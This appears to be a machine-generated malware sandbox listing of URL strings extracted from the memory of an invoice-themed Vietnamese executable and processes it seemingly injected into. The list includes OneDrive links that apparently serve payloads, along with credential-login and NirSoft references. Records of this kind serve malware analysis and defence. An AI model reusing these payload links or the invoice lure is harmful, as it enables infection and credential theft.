Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: aspnet_compiler.exe, 00000010.00000002.374830340.00000000009EA000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001B.00000002.392736661.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000020.00000002.416712597.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000024.00000002.432581722.0000000000EFA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com/
Source: aspnet_compiler.exe, 00000029.00000002.453919934.000000000135A000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com/B
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: bhv8995.tmp.39.dr String found in binary or memory: http://www.msn.com
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://www.msn.com/
Source: aspnet_compiler.exe, 0000000E.00000003.388842971.0000000002746000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401780181.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.405195939.0000000002A86000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.436504638.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433788536.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463221264.0000000003003000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.466714622.0000000003006000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.487705843.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481529759.00000000028A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.504317340.0000000000A46000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.500729020.0000000000A43000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386489638.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: bhv8995.tmp.39.dr String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: bhv8995.tmp.39.dr String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: aspnet_compiler.exe, 0000000E.00000002.397869869.00000000008F4000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.477360003.0000000000FB4000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000002.502161495.00000000008F4000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000002.513031021.00000000001B3000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: aspnet_compiler.exe, 0000001D.00000002.452238930.0000000000AF4000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net-ms-win-core-delayload-l1-1-0.dll.dlldll
Source: aspnet_compiler.exe, 00000013.00000002.420022464.0000000000AF4000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net-ms-win-core-delayload-l1-1-0.dll.dlldllD
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: aspnet_compiler.exe, 0000000E.00000003.389075530.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.387362891.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386841625.000000000274F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000002.399020407.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.405740742.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401873684.000000000120A000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401655529.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000002.422082458.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000002.455045363.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.436842526.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433912633.000000000115A000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433511256.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.480242227.00000000036E2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.467030743.00000000036E2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463006657.000000000300F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463367055.000000000148A000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481760272.00000000011BA000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.488827265.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481292516.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000002.504901021.0000000002F62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
Source: bhv8995.tmp.39.dr String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
Source: bhv8995.tmp.39.dr String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://contextual.media.net/
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: bhv8995.tmp.39.dr String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: bhv8995.tmp.39.dr String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: aspnet_compiler.exe, 0000000E.00000003.389075530.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386841625.000000000274F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401748327.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433671270.00000000028E6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463192812.0000000003016000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481477826.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.500671413.0000000000A56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
Source: bhv8995.tmp.39.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: aspnet_compiler.exe, 0000000E.00000003.389075530.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386841625.000000000274F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401748327.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433671270.00000000028E6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463192812.0000000003016000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481477826.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.500671413.0000000000A56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
Source: bhv8995.tmp.39.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: bhv8995.tmp.39.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: bhv8995.tmp.39.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: bhv8995.tmp.39.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: bhv8995.tmp.39.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: bhv8995.tmp.39.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: bhv8995.tmp.39.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: bhv8995.tmp.39.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: bhv8995.tmp.39.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: bhvF833.tmp.14.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: bhv8995.tmp.39.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: bhv8995.tmp.39.dr String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.355126935.000000000253C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://kpf0yw.am.files.1drv.com/y4m6O4Ornh9bC3LU6E6AhRMu7htyE0P8yda7QdnFwV6RfxyvsjxNs5Be-VablD5fo4Z
Source: Shhejayly.exe, 00000012.00000002.539080976.000000000254C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://kpf0yw.am.files.1drv.com/y4mDTH7qGldoE19yex0JjOdCD7abQr3OT41x7HoVD-gSuwIqkSH1AKWWpBjmzkRc7T3
Source: Shhejayly.exe, 0000001C.00000002.538759084.000000000252C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://kpf0yw.am.files.1drv.com/y4mohw2-jA2-enkz0nKTLzUjPRBNoO5ZAah_FcRnfkog9p26ZH43g9AnI4ZgfSnm5Rt
Source: Shhejayly.exe, 00000012.00000002.539080976.000000000254C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538759084.000000000252C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://kpf0yw.am.files.1drv.com45k
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.355126935.000000000253C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://kpf0yw.am.files.1drv.com45kT
Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: aspnet_compiler.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.537970433.000000000250C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.537475545.00000000024E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com
